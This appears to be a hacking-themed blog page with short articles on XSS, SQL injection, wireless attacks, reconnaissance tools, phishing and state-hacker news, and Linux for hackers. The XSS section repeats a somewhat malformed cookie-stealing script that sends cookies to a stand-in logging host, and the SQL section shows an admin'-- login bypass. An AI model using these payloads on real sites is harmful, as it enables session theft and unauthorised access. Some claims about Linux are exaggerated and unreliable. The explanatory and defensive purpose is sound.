How Do Hackers Hijack Websites And Browser Using Xss

 

What is Cross Site Scripting(XSS)?

Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. This is a combination of HTML and XSS provided by the attacker, but XSS can also be used to deliver malicious downloads, plugins, or media content. In this case hacker execute some malicious links into the website or an app.

If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system.

As a result, the attacker can steal the user’s active session cookie.
Here’s an example:

<script> i=new/**/Image();isrc=http://example.com/log.php?'+document.cookie+' '+document.location</script>

Because XSS can allow untrusted users to execute code in the browser of trusted users and access some types of data, such as session cookies, and many time hackers get some website credentials which they get full control on websites.

How does cross site scripting work?

Cross-site scripting works by manipulating a vulnerable website or an application so that it returns malicious JavaScript to users.The attacker injects some code in it.

Attackers can also carry out an attack by modifying a request. If the app or website lacks proper data sanitization, the malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can steal the user’s active session cookie.

Here’s an example:

<script> i=new/**/Image();isrc=http://example.com/log.php?'+document.cookie+' '+document.location</script>

While the payload is usually JavaScript, XSS can take place using any client-side language.

What does the attacker do the credentials?

The attacker do these things:-

• *Hijacking A website And Browser
• *Capturing the keystrokes of a user.
• *Redirecting a user to a malicious website.
• *Running web browser-based exploits (e.g., crashing the browser).
• *Obtaining the cookie information of a user who is logged into a website (thus compromising the victim’s account).

In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can trick users into entering credentials on a fake form, which provides all the information to the attacker.

What are the different types of XSS attacks?

Stored XSS:-

Takes place when the malicious payload is stored in a database. It renders to other users when data is requested—if there is no output encoding or sanitization.

Reflected XSS:-

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

DOM-based XSS:-

DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.

How to prevent XSS vulnerability?

There are some strategies to prevent XSS attacks:

• *Never trust user input.
• *Implement output encoding.
• *Perform user input validation.
• *Follow the defense in depth principle.
• *Ensure that web application development aligns with OWASP’s XSS Prevention *Cheat Sheet.
• *After remediation, perform penetration testing to confirm it was successful.

Protect your organization by following secure development guidelines—building security in at all phases of the application’s development. Output encoding is also key to preventing XSS vulnerabilities. Make use of output encoding libraries that are relevant to the programming languages and frameworks your organization uses. Also, ensure your developers stay up-to-date with XSS prevention best practices.

Read More

How Hackers Leak Databases | Sql Injection Vulnerablity

 

What is SQL injection?

The Wikipedia article on SQL injection reads:

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution.

SQL Injection is a web-based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used today. This attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the prior web application.

The underlying fact that allows for SQL injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let’s consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt.

Here is a typical example:

select * from users where username='admin' and password='admin123′;

If the attacker knows the username of the application administrator is admin, he can log in as admin without supplying any password.

admin'–

The query in the back-end looks like:

Select * from users where username='admin'–' and password='xxx';

Note the comment sequence (–) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username='admin';

So password check is bypassed.

Read More

Wireless Hacking Basic Knowledge

 

Wireless Network Sniffing :-

Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

Stations and Access Points :-

A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

Passive Scanning :-

Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

Channels :-

The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

Wired Equivalent Privacy (WEP) :-

It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

Detection of SSID :-

The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning.

Collecting the Frames for Cracking WEP :-

The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

Detection of the Sniffers :-

Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

Wireless Spoofing :-

There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

Denial of Service :-

A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

MAC Address Spoofing :-

The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

IP spoofing :-

Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

Frame Spoofing :-

The attacker will inject frames that are valid but whose content is carefully spoofed.

Wireless Network Probing :-

The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

AP Weaknesses :-

APs have weaknesses that are both due to design mistakes and user interfaces.

Trojan AP :-

An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

War Driving :-

Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Jamming the Air Waves :-

A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

Tips for Wireless Home Network Security

• Change Default Administrator Passwords (and Usernames)
• Turn on (Compatible) WPA / WEP Encryption
• Change the Default SSID
• Disable SSID Broadcast
• Assign Static IP Addresses to Devices
• Enable MAC Address Filtering
• Turn Off the Network During Extended Periods of Non-Use
• Position the Router or Access Point Safely

Read More

Information Gathering – First Step Of Hacking

 

What’s information gathering?

When it comes to getting a clear information gathering concept, the simplest way to define it would be the process of collecting information about something you are interested in. A practical example: gathering information with your eyes is called visual perception. In the same way, in the digital world, a lot of information can be gathered in different ways, not with your senses, but with several methods, tools and techniques.

Information gathering is a phase of penetration testing or ethical hacking. Where hackers or attackers gather the information as much as possible elated internal and external security architecture.

They have to face a target. The details of any system help the attacker to identify the vulnerabilities within it, which can be exploited and gain access in later faces.

If you have deep knowledge about the target reduces the focus area & brings you closer to the target. More information about target more possibilities to win.

If you have enough required details about the target, you are close to getting key to hacking.

For Example, You focus the target by mean of the range of IP address you have to go through, to hack target or regarding domain information or else.

What are the objectives of information gathering in cybersecurity?

Any basic cybersecurity information gathering process often includes these two types of data collection goals:

• Collecting network data: Such as public, private and associated domain names, network hosts, public and private IP blocks, routing tables, TCP and UDP running services, SSL certificates, open ports and more.
• Collecting system-related information: This includes user enumeration, system groups, OS hostnames, OS system type (probably by fingerprinting), system banners (as seen in the banner grabbing blog post), etc.

But there’s a lot more involved. Let’s learn about it, by exploring the most popular techniques used during this phase.

Information gathering techniques and methods

Ethical hackers use a big variety of techniques and tools to get this precious information about their targets, as well as locations and data collection software they’ll be using towards the information gathering goal.

Let’s look at the top information gathering methods used to gather information about any target.

How to gather information?

• Social engineering: This includes in-person chat, phone conversations and email spoofing attacks. What all these methods have in common is the psychology of human weakness, needed to get maximum data about the target.
• Search engines: Web crawlers can be used to fetch information about anything, and this includes companies, persons, services, and even real hacks, as seen in our previous article about Google Hacking.
• Social networks: Facebook, Twitter, LinkedIn and other social networks are great sources of information to build a profile, especially when targeting individuals.
• Domain names: These are registered by organizations, governments, public and private agencies, and people. Therefore, they’re a great starting point when you want to investigate someone. Personal information, associated domains, projects, services and technologies can be found by inspecting domain name information.
• Internet servers: authoritative DNS servers are a great source of information, as they often include every single surface point exposed to the Internet—which means a direct link to related services such as HTTP, email, etc.

All these techniques are really useful when combined with enterprise security tools. Keep reading to discover how to maximize your information gathering results by using some really cool infosec utilities.

Information gathering tools

There are a lot of tools to discuss when talking about information gathering, including one particular software we can’t avoid mentioning… that’s Kali Linux, one of the most popular cyber security linux distributions around.

We’ve written about the top Kali Linux tools before, but that was a general review of the most popular tools on that Linux distro. When it comes to information gathering, Kali Linux includes one of the biggest collections ever. To be precise, exactly 67 information gathering utilities will help you get all the valuable data you need during your infosec investigations. Creating a full list of all the information gathering tools available would be monumental, not to mention difficult.

That’s why we’ve created a summary of the top 12 most popular tools that, in our experience, may help you during your information gathering process:

• Nmap: Our beloved network scanner will be always in the #1 position when it comes to data gathering tools. It can be used not only to scan ports and service fingerprinting, but also as a DNS enumeration and network mapping tool.
• Unicornscan: Combined with Nmap, it can give you the complete picture of any remote network or host, as it is able to perform asynchronous stateless TCP scanning with all variations of TCP flags, as well as TCP banner grabbing, async UDP Scanning, OS fingerprinting, and much more.
• Sublist3r: This is one of the best subdomain enumeration tools around, one that will help you create a virtual subdomain map of any website in no time. By using Google dorks and other search engines such as Baidu, Ask, Yahoo or Bing, it can also be used to perform a brute force subdomain discovery attack with wordlists, thanks to its subroute integration.
• DMitry: Its name stands for Deepmagic Information Gathering Tool, and is one of the top terminal-based tools when it comes to intel reconnaissance tasks. It will allow you to get any available data from any host, such as subdomains, email addresses, open ports, WHOIS lookups, server data, and more.
• OWASP Amass: Also known simply as ‘Amass’, this information gathering tool helps researchers and IT administrators create a full map of their digital assets by providing an easy way to perform DNS enumeration, asset location, and overall attack surface discovery.
• Axiom: This new tool is one of the best available when you need to get massive amounts of data in a limited time. It’s basically a dynamic infrastructure framework that helps system administrators and researchers build and deploy offensive and defensive security multi-cloud infrastructure in mere seconds, by using pre-installed tools based on OS images.
• Th3inspector: This infosec utility will enable you to fetch all kinds of website-related information, such as page data, phone number, ip addresses of HTTP and email server, perform a domain WHOIS lookup, bypass the Cloudflare proxy, check the age of your domain name, scan remote active services, subdomain mapping, and even work as a CMS detector.
• Devploit: This tool is used to extract DNS and domain data, including DNS lookups, WHOIS lookup information, reverse IP info, port scanning, DNS zone transfer, HTTP-headers, GEOIP lookup, subnet lookup, etc.
• Bettercap: Known as the swiss army knife for networking, it’s used mostly for network recon and information gathering, especially for WiFi, Bluetooth low energy devices and Ethernet networks.
• Traceroute: As one of the most popular network tools used to track the path of networks packets between one IP address to another, it’s a powerful recon tool that will let you gain critical network information about IP addresses and networking routes.
• WHOIS: The WHOIS command is a great source of data for fetching domain- and IP-related information, including tech and admin names, telephones, addresses, country, DNS servers, etc.
• Dig: Whenever you need to find current data about DNS records, Dig is one of the best tools there is to help you to accomplish that task, whether you want to get A, NS, TXT or CNAME records.

Read More

TODAYZOO PHISHING KIT USED TO SWIPE MICROSOFT CREDENTIALS

 Microsoft has detailed an unusual phishing campaign aimed at stealing passwords that uses a phishing kit built using pieces of code copied from other hackers’ work.

A “phishing kit” is the various software or services designed to facilitate phishing attacks. In this case, the kit has been called ZooToday by Microsoft after some text used by the kit. Microsoft also described it as a ‘Franken-Phish’ because it is made up of different elements, some available for sale through publicly accessible scam sellers or reused and repackaged by other kit resellers.

Microsoft said TodayZoo is using the WorkMail domain AwsApps[.]com to pump out email with links to phishing pages mimicking the Microsoft 365 login page.

Microsoft says the attackers have been creating malicious AWS WorkMail accounts “at scale” but are just using randomly generated domain names instead of names that would represent a legitimate company.

In other words, it’s a crude phishing product likely made on a thin budget, but large enough to be noticeable. It caught Microsoft’s attention because it impersonated Microsoft’s brand and used a technique called “zero-point font obfuscation” – HTML text with a zero font size in an email – to dodge human detection.

Microsoft detected an uptick in zero-font attacks in July. TodayZoo campaigns in April and May of this year typically impersonated Microsoft 365 login pages and a password-reset request. However. Microsoft found that campaigns in August used Xerox-branded fax and scanner notifications to dupe workers into giving up credentials.

Microsoft’s threat researchers have found that most of the phishing landing pages were hosted within cloud provider DigitalOcean.

Those pages were identical to the Microsoft 365 signin page. Another unusual trait was that after harvesting credentials, the stolen information was not forwarded to other email accounts but stored on the site itself. This behaviour was a trait of the TodayZoo phishing kit, which has previously focussed on phishing credentials from Zoom video-meeting accounts.

But Microsoft researchers believe this phishing group is a single operation rather than a network of agents.

“While many phishing kits are attributed to a wide variety of email campaign patterns and, conversely, many email campaign patterns are associated with many phishing kits, TodayZoo-based pages exclusively utilized the same email campaign patterns, and any of those subsequent email campaigns only surfaced TodayZoo kits.

These lead us to believe that the actors behind this specific TodayZoo implementation are operating on their own,” Microsoft said. Microsoft says it informed Amazon about the TodayZoo phishing campaign and that AWS “promptly took action”.

Read More

Google Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries

 Google’s Threat Analysis Group (TAG) on Thursday said it’s tracking more than 270 government-backed threat actors from more than 50 countries, adding it has approximately sent 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021.

The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from “blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.”

Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorous, or Newscaster), including a sophisticated social engineering attack dubbed “Operation SpoofedScholars” aimed at think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London’s School of Oriental and African Studies (SOAS).

Details of the attack were first publicly documented by enterprise security firm Proofpoint in July 2021. Other past attacks involved the use of a spyware-infested VPN app uploaded to the Google Play Store that, when installed, could be leveraged to siphon sensitive information such as call logs, text messages, contacts, and location data from the infected devices.

Furthermore, an unusual tactic adopted by APT35 concerned the use of Telegram to notify the attackers when phishing sites under their control have been visited in real-time via malicious JavaScript embedded into the pages. The threat actor is also said to have impersonated policy officials by sending “non-malicious first contact email messages” modeled around the Munich Security and Think-20 (T20) Italy conferences as part of a phishing campaign to lure high-profile individuals into visiting rogue websites.

“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Google TAG’s Ajax Bash said.

Read More

Why Hackers Use Linux ? And Popular Linux Operating Systems.

 

Why do Hackers use Linux :

Operating system Linux has amazing features that make it more dominating than others. It is an open source operating system and driven by its old version UNIX .

Due to its many benefits over any other OS, hackers prefer to use Linux. We know other operating systems are friendlier in use but Linux has many special features which make it more dominating than others.

Hackers are those who want to earn through their hacking capabilities, they break into a computer system or computer networks, and hack them to get profit from them.

Hackers always want to check their hacking capabilities, so they always look for more secure OS to perform their activities and Linux is the best choice for them.

Low cost

Linux is an open source OS so it’s easily available on the internet and the applications that run on it are free of cost. Hackers need not to spend time and money to buy licenses for Linux because it most of the software comes with General public license. This is also one of reason that Why do Hackers use Linux.

Also,Only Linux is that OS which doesn’t need to be rebooted occasionally to improve its performance. You don’t need to restart it again and again to maintain its performance. It doesn’t get slow or freeze up due to memory leaks, Linux OS can be used for years without any problem.

Maintenance

Maintaining Linux operating system is very easy. One can easily install the software. Linux is used for high-performance applications on server, and also for desktop applications and embedded systems.

Maintaining Linux is very easy because it has their own software repository. You can easily search the software.

Command line and graphical user interface

Due to its strong and highly integrated command line interface users are granted for easier access and control over their systems. Utilities built in Linux have greater functionality.

It is highly designed around strong and highly integrated command line interfacewhich others OS like window and mac don’t have. Hackers and other user are allowed to have great access their system. Only Linux can work well even if the hard disk is full, which is impossible for other operating systems.

Open source

To develop software you need to know the system code, how to develop the code how to modify it.

In Linux, it will be easy for you to learn the source code because it’s very easy and also all the applications of this operating system are open source which is the benefit. The Linux system can support the entire UNIX software package and all the files which are common to it.

Ease to Install and network friendly

Linux comes with the user-friendly installation as most of the Linux distributions are user-friendly. These distributions come with that tools which make it easy to install and also the additional software are very user friendly. Boot system of the Linux is very fast as compare to other operating systems.

It will work as an open source because it is contributed by the team on internet networks o it very easy to manage the network over it. There are many libraries and commands provided by Linux that can be used to test network penetrations. Due to its operating system reliability, it makes the network faster than any other operating system.This is also one of the reason Why do Hackers use Linux.

Multi-tasking and security

Linux is designed in that way it can do many things at the same time like if a large printing job is in the background, it will not slow down your work, you can easily do much work without getting disturbed by problems such as system hanging, slow processing like other operating systems.

Linux is typically more secure as compare to other operating systems. Hackers need the more secure system to perform their Hacks, so most of the hackers were by the Linux for the hacking. Windows are more popular between average users and also among the programmersbecause it is more profitable to right the program in windows. So Linux is more securethan windows as less users use them.

Transparency

This is one of the main reason Why do Hackers use Linux.To utilize your hacks you must need to understand the operating system properly to large extent. You must need to have knowledge of OS which you are going to hack.

So for this, you need a system without any loopholes, Linux is completely transparent i.e. you can easily manipulate and watch the working of Linux.

This is not same with the Windows. Microsoft gives you to work only that what Microsoft want but on another hand, Linux was developed as an operating system that provides you more control over it rather than to make you do what you want.

You can control what you want to do which is basically necessary to hack a system.

>>>>>

So these were some features which make Linux operating system the best choice among the many hackers. Hacking has become the elite profession among the IT field.

This is because hacking requires the detailed knowledge of the IT concepts. So Linux is the much require for hackers to hack. Linux is typically more secure as compared to any other operating system, so pro hackers always want to work on the operating system which is more secure and also portable. Linux gives infinite control to the users over the system.

Due to its portability user can easily make the script in any of script language. So you need not target the same operating system to show your hacking capabilities, Linux is universal so you will not face any compatibility problems.

So acknowledge the above factors, hackers always want an operating system that provides maximum security to test their skills and also they need.

These are the main reasons Why do Hackers use Linux.

List Of Best Linux Operating Systems Usage In Hacking

Kali Linux

By far the most popular “hacking”/penetration testing Linux OS out there. (Link: https://www.kali.org/). Kali has a vast dimension of tools pre-installed and one can get up and running in a very short amount of time.

Parrot OS

Refined UI, lightweight and expert support are some of the USPs of this distro. (Link: https://parrotlinux.org/). Dedicated CDN’s mean lightning-fast downloads. Surfing the web privately has been made extremely easy on this OS.

BackBox

Based on Ubuntu, this OS consumes minimal resources and offers a simple and easy-to-use desktop manager (Link: https://www.backbox.org/). It has been specifically designed to reduce redundancies. Enables users to simulate attacks on applications or networks.

Black Arch

BlackArch Linux is an Arch Linux-based penetration testing distribution for penetration testers and security researchers. (Link : https://blackarch.org ) The repository contains 2743 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

Read More